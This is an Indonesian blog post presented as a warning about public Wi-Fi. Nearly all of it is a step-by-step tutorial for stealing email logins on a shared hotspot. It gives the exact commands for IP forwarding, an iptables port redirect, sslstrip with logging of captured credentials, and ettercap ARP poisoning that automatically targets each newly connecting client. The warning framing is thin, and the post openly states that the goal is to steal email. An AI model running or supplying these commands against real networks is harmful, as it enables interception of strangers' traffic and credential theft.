Tuesday, October 23, 2012

Bahaya Bermain Internet Di Hotspot

 Mungkin agan agan sekalian belum tau ya bahaya  bermain internet di hotspot gratisan ? =)) Bahayanya seperti ini nih.

Di sini dalam tutorial ini saya akan menjelaskan bagaimana untuk memecahkan enkripsi SSL tanpa melanggar enkripsi SSL menggunakan Man in the middle Attack untuk mencuri email dalam satu jaringan

1.Buka terminal lalu ketikkan perintah

echo 1 > /proc/sys/net/ipv4/ip_forward

2.ketikkan perintah selanjutnya

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321

3.ketikkan perintah berikutnya

cd /pentest/web/sslstrip

4.ketikkan perintah berikutnya

python sslstrip.py -p -l 54321

[Image: Selection_002.png]

Lalu kita akan membuat log untuk menyimpan email

buka terminal baru lalu ketikkan perintah seperti dibawah ini
cd /pentest/web/sslstrip
tail -f sslstrip.log

[Image: Selection_003.png]

Buka terminal baru lagi lalu ketikkan perintah seperti di bawah ini

ettercap -T -M arp // // -i wlan1 -l dumpfile -q -P autoadd

ket = wlan1 adalah interface yang saya gunakan sesuaikan interface kalian

Fungsi ettercap autoadd adalah apabila ada client yang baru konek hotspot maka otomatis akan di racuni IP client tersebut
[Image: Selection_006.png]

Hasil di terminal ETTERCAP

[Image: Selection_005.png]

Bahaya sekali bukan main internet di tempat hotspot gratisanmalingmalinghmm
Silahkan Tinggakkan Komentar -)